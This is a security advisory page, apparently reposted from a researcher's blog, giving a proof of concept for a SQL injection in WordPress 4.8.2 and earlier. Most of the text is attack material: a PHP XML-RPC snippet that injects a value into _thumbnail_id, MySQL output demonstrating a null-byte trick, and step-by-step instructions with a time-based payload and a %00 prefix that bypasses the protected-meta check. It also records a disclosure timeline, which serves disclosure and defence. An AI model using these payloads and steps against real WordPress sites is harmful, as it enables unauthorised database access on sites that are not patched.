Wordpress <= 4.8.2 SQL Injection POC

2017.11.13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Wordpress <= 4.8.2 SQL Injection POC Author: Ambulong@vulspy I found this vulnerability after reading slavco’s post, and reported it to Wordpress Team via Hackerone on Sep. 2nd, 2017. But, unfortunately, WordPress team didn’t pay attention to this report too. # SQL Injection Details Wordpress SQLi by slavco https://medium.com/websec/wordpress-sqli-bbb2afcc8e94 Wordpress SQLi — PoC by slavco https://medium.com/websec/wordpress-sqli-poc-f1827c20bf8e Wordpress SQLi — how to find by slavco https://medium.com/websec/wordpress-sqli-how-to-find-ebee713457e4 Disclosure: WordPress WPDB SQL Injection - Technical by ircmaxell # POC Details If you already found out the potential sqli in wordpress, you would know that we need to insert our playload into _thumbnail_id meta in order to launch the sqli attack. ## Wordpress ≤ 4.7.4 Lack of capability checks for post meta data in the XML-RPC API This vulnerability have mentioned in slavco’s post: Wordpress SQLi Reference: WordPress 4.7.5 Security and Maintenance Release POC $usr = 'author'; $pwd = 'author'; $xmlrpc = 'http://local.target/xmlrpc.php'; $client = new IXR_Client($xmlrpc); $content = array("ID" => 6, 'meta_input' => array("_thumbnail_id"=>"xxx")); $res = $client->query('wp.editPost',0, $usr, $pwd, 6/*post_id*/, $content); ## Wordpress ≤ 4.8.2 POST Meta Protection Bypass A trick of Mysql 1). A normal query for _thumbnail_id mysql> SELECT * FROM wp_postmeta WHERE meta_key = '_thumbnail_id'; +---------+---------+----------------+------------+ | meta_id | post_id | meta_key | meta_value | +---------+---------+----------------+------------+ | 4 | 4 | _thumbnail_id | TESTC | +---------+---------+----------------+------------+ 1 row in set (0.00 sec) 2). Change the meta_value of _thumbnail_id to “\x00_thumbnail_id” mysql> update wp_postmeta set meta_key = concat(0x00,'TESTC') where meta_value = '_thumbnail_id'; Query OK, 0 rows affected (0.00 sec) Rows matched: 0 Changed: 0 Warnings: 0 3). Query by _thumbnail_id again mysql> SELECT * FROM wp_postmeta WHERE meta_key = '_thumbnail_id'; +---------+---------+----------------+------------+ | meta_id | post_id | meta_key | meta_value | +---------+---------+----------------+------------+ | 4 | 4 | _thumbnail_id | TESTC | +---------+---------+----------------+------------+ 1 row in set (0.00 sec) POST Meta Protection Bypass This is the is_protected_meta(./wp-includes/meta.php) method used to check the validation of post meta: function is_protected_meta( $meta_key, $meta_type = null ) { $protected = ( '_' == $meta_key[0] ); /** * Filters whether a meta key is protected. * * [@since](/since) 3.2.0 * * [@param](/param) bool $protected Whether the key is protected. Default false. * [@param](/param) string $meta_key Meta key. * [@param](/param) string $meta_type Meta type. */ return apply_filters( 'is_protected_meta', $protected, $meta_key, $meta_type ); } The code just checks the first character of $meta_key, from the mysql trick, we can use %00_ to bypass it. POC Add New Custom Field, Name:_thumbnail_id Value:55 %1$%s or sleep(10)# Click Add Custom Field button. Modify the HTTP request, _thumbnail_id => %00_thumbnail_id Launch the attack. Visit /wp-admin/edit.php?action=delete&_wpnonce=xxx&ids=55 %1$%s or sleep(10)#. Time-line: Sep. 2th - I report the vulnerability to WP Team via Hackerone. Sep. 6th - WP Team ask for details. Sep. 6th - I post the details. Sep. 6th to now - I haven’t received any response yet…

References:

https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
https://medium.com/websec/wordpress-sqli-poc-f1827c20bf8e
https://medium.com/websec/wordpress-sqli-how-to-find-ebee713457e4
https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
http://blog.vulspy.com/2017/11/09/Wordpress-4-8-2-SQL-Injection-POC/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top